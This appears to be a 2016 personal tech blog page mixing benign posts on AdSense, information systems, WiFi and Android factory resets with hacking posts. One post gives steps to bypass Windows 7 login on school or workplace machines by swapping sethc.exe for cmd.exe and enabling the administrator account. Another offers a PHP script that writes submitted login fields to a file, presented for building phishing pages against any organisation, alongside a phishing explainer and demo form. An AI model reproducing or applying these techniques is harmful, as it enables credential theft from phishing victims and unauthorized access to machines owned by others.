AD (728x90)

Powered by Blogger.

Some Text

  • 2793 Pine St

    Living a dot com Lifestyle.

    When you choose dot com lifestyle, you actually choose a life of freedom where you can live and work as per your own time and you are always free from worries abour earnings

Feature Top (Full Width)

Latest Updates

Friday 22 July 2016

What is Google AdSense and how it Works?

Google AdSense is an Ad placement service that allows Publishers in the Google Network of Content Sites to serve automatic ads which target audience basis of their geo location, interest, and also use to serve ads that relates to the content in which readers are engaged. AdSense also acts as dashboard for the publishers where you can check and manage ads shown on your website and earnings from ads.



The complete Google Advertisement Network uses two channel systems, namely, Google AdSense for the Publishers and Google Adwords for the Advertisers. Adwords take the ads and fee for advertising from the merchants, service providers, firms and other such institutions that are willing to advertise through the medium of Google. After that the same ads are shown by the Publishers who are using AdSense to serve ads on their website. The system actually works perfect than any other online advertisement service because of large reach, power of targeting audience and two frontend advertising network.


We are talking about Google AdSense that is a very good opportunity for the publishers to make money by serving ads on their blogs and websites. Google AdSense pays to its publishers for each click on the ads served by him on his website or blog. The term that is officially used for pay per click in the Google Advertising is CPC(Cost Per Click), it is very commonly used term and is defined as, “CPC(Cost Per Click) is the amount paid by Google AdSense for a single click to the publisher”, And that is one of the main factor that makes Google AdSense so popular.

Here is a Diagram that will help you to understand functioning of Google Ads network and Google AdSense works.


The process starts with Google Adwords from where Google get Ads and money, then it passes it to Google Adsense after taking out it's commission. Actually Google charges for every click from the advertisers and out of that Google keep it's commission and add rest in Adsense account of the Publisher.

As per my personal experience Google AdSense is best PPC advertising network for the publishers, I am using AdSense to monetise my Blogs and websites from past 2 years and I want to tell you there is no hurdle in making money from AdSense if you are not going against AdSense Policies. I would suggest you to read it carefully before applying for AdSense. To prevent interest of Advertisers and Publishers AdSense have some strict rules that every publisher need to follow to make money from Google AdSense. For the new bloggers it is best option to start selling ad-space as it is most convenient and simple to use advertising system for the publishers.

Friday 10 June 2016

Introduction To Information System

Information System take birth from the Information Technology, but it is no more just a part of Information Technology. Today, Information System has provided highly productive results and becoming more efficient with every passing day. Essentially, it provides the necessary information for business operations. It has been designed with the aim to support all business functions. The complex business functions get help from various types of Information Systems to sustain and develop in dynamic business environment.


Information System is made up of two terms, namely, Information and System. Information can be defined as well-arranged and structured meaningful data, and System is an arrangement for accessing, using, and modifying the information by taking input and providing output after completing the required process. In simple words, Information System is an arrangement that processes data and provides meaningful information. An Information System use several interrelated components like to collect, store, process, generate, and disseminate information for effective business functioning. Such information is very important for every organization as it supports decision making and also helps in controlling various organizational departments and their functions. Information System can be useful for both individual departments and all departments collectively.

An Information System Model
The data for an Information can be collected from various sources such as employees for their personal details and competitors performance. This data can be stored in printed format over the paper and electronic format with the help of a computer. The processing of this data includes calculations, logical analysis, and other statistical methods, depending upon the information that we want to derive. After the processing of data, it is transformed into information. This information helps and supports end users for decision making, problem solving, strategy forming, and controlling functions in an organization.

For example, the data about individual sales by each sales associate in a month, the general sales target for each associate, and market sales trends for that month can be put to use. This data can be stored, classified, and analyzed to produce meaningful information about the sales trends for that time period, gaps between the targets and actual sales for individual associates, and the aggregate sales based on teams. The same data can also be used for predicting the sale for next month, target setting for the next month, and planning for future sales.

Friday 27 May 2016

How to Hack Windows 7 To Claim Admin Account

On workplaces, school labs usually the administrator access is secured with password and a guest access is provided. And some times it becomes a great hurdle in the way of doing something that requires admin permission. As a solution to this problem I cane up with my new post about Hacking Windows 7 which will guide you through out the process of Hacking windows 7 without any additional hardware and software with the help of a little back door trick.

Follow these simple steps to hack the Windows 7 easily :

Step 1 - Turn on the power and CPU and press F8 rapidly on boot screen to get to the Start-up menu.

Windows Start-up Menu

Now choose Start Windows Normally option from the menu, hit Enter button and immediately turn off the power.

Step 2 - Now again turn on the power and let the system load the two options, first one is Launch Start-up repair(recommended) and Start Windows Normally.


We have to go with the first option that is Launch Start-up repair(recommended), and let it load and scan for issues.

Step 3 - After scanning it will ask you to "restore defaults" , select cancel option.


and let it continue, after 15 to 20 minutes an error report would appear asking send information or not.

Step 4 - Ignore it, click on "View Problem Details" arrow, scroll down to the end of the report, then click a link stating X:\windows\ something...something (the link starts with an"X")

Another Window will pop-up, and will look like a notepad (it is a notepad)


Click File on the Menu-Bar, then select Open, and another window will pop-up (that's just too many windows!)

Step 5 - Navigate to C: drive (or whatever drive on which windows is installed), click Windows, then System32, after that click on the arrow beside the "File Type" option and select "all files"


Then search for a file named "sethc"(this is the shortcut to stickey keys), rename it to something else (Eg:abc), and Now Search for cmd, make its copy and rename the copy as "sethc"
Step 6 - Close everything, restart the PC, go to the log-in screen, press shift 5 times, until a cmd (command prompt) pops-up.


Type in "net user administrator /active:yes", and this will activate the default administrator account of the PC. Change/delete/manage/reset passwords from there, Or you can directly change passwords from cmd, type "net user (admin/any admin account's name) and then after a space put an asterix.

Tuesday 24 May 2016

How to change pattern screen lock on Android mobile without Gmail.



Pattern lock is most commonly used medium for the security of our Android phones and it seems to be best option to keep out android device secure device. On other hand, it creates problem for many guys also, when we forgot our android mobile pattern lock, its very difficult to unlock it. Being a tech guy it looks odd to go to a shot  who will surely charge you some money to unlock your android mobile. But Today,I am sharing amazing method to reset pattern lock easily. This method comes in handy when you forgets password of your gmail account. Thus you don't even need Gmail password to reset your Android mobile pattern even without loosing data.

Nowadays, most of guys owns android phone, and when you give your android phone to small children or any other guy, and by mistake they change pattern lock of your mobile or they try wrong password many times, than your android device is completely locked. So, using this method you can easily reset or unlock pattern of your android device.


With the help of this tutorial I am showing you method to reset pattern lock of android mobile easily, if you have forgotten pattern lock of your android phone. Just follow these steps to unlock your android device.

  1. Switch off your android phone.
  2. Now we need to get booted into the recovery of the device and for that we have different options for different devices. For Samsung devices press "Volume up + Power Key + Home button" at the same time and for other devices press " Volume down + Power Key + Home button" at the same time.
  3. Now you will be booted in the recovery section here use volume keys for scrolling and use Homr or Power key for selecting an option.
  4. Look for Wipe Data or Delete all user data or Restore factory defaults and select it using Power button.
  5. Now reboot your phone and congratulations you have unlocked device without spending a single panny.

Sunday 22 May 2016

What is WiFi and How does it work?



WiFi is a wireless networking technology that uses radio waves for the network connectivity. WiFi establishes a WLAN(Wireless Local Area Network) by allowing connectivity to electronic devices and the wireless connection is based on the 2.4 gigahertz (12 cm) UHF and 5 gigahertz (6 cm) SHF ISM radio bands. Basically an adopter is used to create hotspots that covers an area and makes it wifi zone in which any device can connect to the hotspot it only need to be WiFi enabled.

Devices which can use Wi-Fi technology include personal computers, video-game consoles, smartphones, digital cameras, tablet computers and digital audio players. Wi-Fi compatible devices can connect to the Internet via a WLAN network and a wireless access point. Such an access point (or hotspot) has a range of about 20 meters (66 feet) indoors and a greater range outdoors. Hotspot coverage can be as small as a single room with walls that block radio waves, or as large as many square KM achieved by using multiple overlapping access points.

Wi-Fi is less secure than wired connections, such as Ethernet, precisely because an intruder does not need a physical connection. Web pages that use TLS are secure, but unencrypted Internet access can easily be detected by intruders. Because of this, Wi-Fi has adopted various encryption technologies. The early encryption WEP proved easy to break. Higher quality protocols (WPA, WPA2) were added later. An optional feature added in 2007, called Wi-Fi Protected Setup (WPS), had a serious flaw that allowed an attacker to recover the router's password. The Wi-Fi Alliance has since updated its test plan and certification program to ensure all newly certified devices resist attacks
.


Wi-Fi connections can be disrupted or the Internet speed lowered by having other devices in the same area. Many 2.4 GHz 802.11b and 802.11g access-points default to the same channel on initial startup, contributing to congestion on certain channels. Wi-Fi pollution, or an excessive number of access points in the area, especially on the neighboring channel, can prevent access and interfere with other devices' use of other access points, caused by overlapping channels in the 802.11g/b spectrum, as well as with decreased signal-to-noise ratio (SNR) between access points. This can become a problem in high-density areas, such as large apartment complexes or office buildings with many Wi-Fi access points. It is advised to only use channel 1-6-11.

Additionally, other devices use the 2.4 GHz band: microwave ovens, ISM band devices, security cameras, ZigBee devices, Bluetooth devices, video senders, cordless phones, baby monitors, and, in some countries, amateur radio, all of which can cause significant additional interference. It is also an issue when municipalities or other large entities (such as universities) seek to provide large area coverage.

How WiFi works?

Like mobile phones, a WiFi network makes use of radio waves to transmit information across a network. The computer should include a wireless adapter that will translate data sent into a radio signal. This same signal will be transmitted, via an antenna, to a decoder known as the router. Once decoded, the data will be sent to the Internet through a wired Ethernet connection.

As the wireless network works as a two-way traffic, the data received from the internet will also pass through the router to be coded into a radio signal that will be received by the computer's wireless adapter.

WiFi Frequencies

A wireless network will transmit at a frequency level of 2.4 GHz or 5GHz to adapt to the amount of data that is being sent by the user. The 802.11 networking standards will somewhat vary depending mostly on the user's needs.

The 802.11a will transmit data at a frequency level of 5GHz. The Orthogonal Frequency-Division Multiplexing (OFDM) used enhances reception by dividing the radio signals into smaller signals before reaching the router. You can transmit a maximum of 54 megabits of data per second.

The 802.11b will transmit data at a frequency level of 2.4GHz, which is a relatively slow speed. You can transmit a maximum of 11 megabits of data per second.

The 802.11g will transmit data at 2.4GHz but can transmit a maximum of 54 megabits of data per second as it also uses an OFDM coding.

The more advanced 802.11n can transmit a maximum of 140 megabits of data per second and uses a frequency level of 5GHz.

PHP Script For Phishing



Phishing is a technique used to steal sensitive and personal information by the medium of a fake webpage that exactly looks like a webpage of a reputed website or financial institution. I have deeply explained about Phishing in my previous post.

Have you ever thought how does the PHP script saves the login credentials to a text file and What is that script?, There is nothing special in this script it is just a simple PHP script that saves the information directly to a text file. This is one of the basic function of PHP that is generally used for gathering information through the medium of a form. The same is happening here, there is a certain action performed on pressing the login button that opens and executes the php script that we are using to save the login information to a text file.

Here I have bring PHP script for you that you can use for with any login page just by putting the php file name in the action attribute of the login button.

<?php
header ('Location:http://www.ayushtyagi.com');
$handle = fopen("hacked.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Using this script you can make phishing page for any organisation and website. Hope you will like it...

What is Phishing?

Phishing


Phishing is a technique used for stealing sensitive personal information such as password, credit/debit card details etc, through the help of a fake webpage that exactly looks like a webpage of a reputed organization.

In general words phishing is a fraud that is triggered by attacker to get financial credentials of the desired person. Phishing is very popular among the cyber criminals as it is easiest part of hacking not part but a little trick. In the process of phishing the attacker creates a webpage that denotes a reputed website but actually it is a fake page that saves the information in a particular file with the help of a script that is usually a php script.

When attacker prepares for a phishing attack, the only challenge that he has to face is to redirect the victim to the page prepared by the attacker. That is usually done through the medium of a mail containing the link to the attacking page and once the victim clicks the link he would be redirected to the page that is quite hard to recognize if it is original page of the entity or not. For example, suppose I am attacker and want to trap a person to get his Facebook username and password, the first step that I would be taking is to create a fake Facebook login page and force the victim to open the page that is hosted somewhere and type his login credentials (username and password), both the text fields are connected via PHP in such a way that the text entered would be automatically saved in a file hosted on the same server.

Generally attackers use to send email which looks genuine as if sent by the original entity because of logos and other identifying information taken from the original website, Besides mail the attackers can also redirect the victim to phishing page by making them click on the link and also malware can be used that would redirect the victim to the page. To make the phishing attack more effective the hackers redirect the victim to original site so that he/she may not be able to recognize that they are trapped.

To understand phishing more deeply have a look on the below diagram that explains the live phishing.

Phishing


In the above diagram there is a victim, a server hosting a website and a communication channel. You can see how the attacker has interrupted the communication channel between the victim and the server by redirecting the victim to a fake webpage and then after again redirected the user to original website.

Although Phishing is not hacking but a fraudulent practice that is most commonly used by the attackers and everyday thousands of people are targeted by the attackers.

Here I have created a phishing login form that would help you to understand phishing more deeply. As practical approach is must. Below this text you can see a login form but actually what is hidden behind this form. Yea there is a PHP script that is working behind this but first you test this login form..




Now you can check what you entered in the below file by refreshing the page..




Now you have experienced how the attackers use phishing for targeting internet users. There is just a simple script that is working behind the login form you can read and learn about the PHP script for phishing in my another post.
Intresting Posts

COPYRIGHT © 2015-16 Ayush Tyagi. All rights resevered.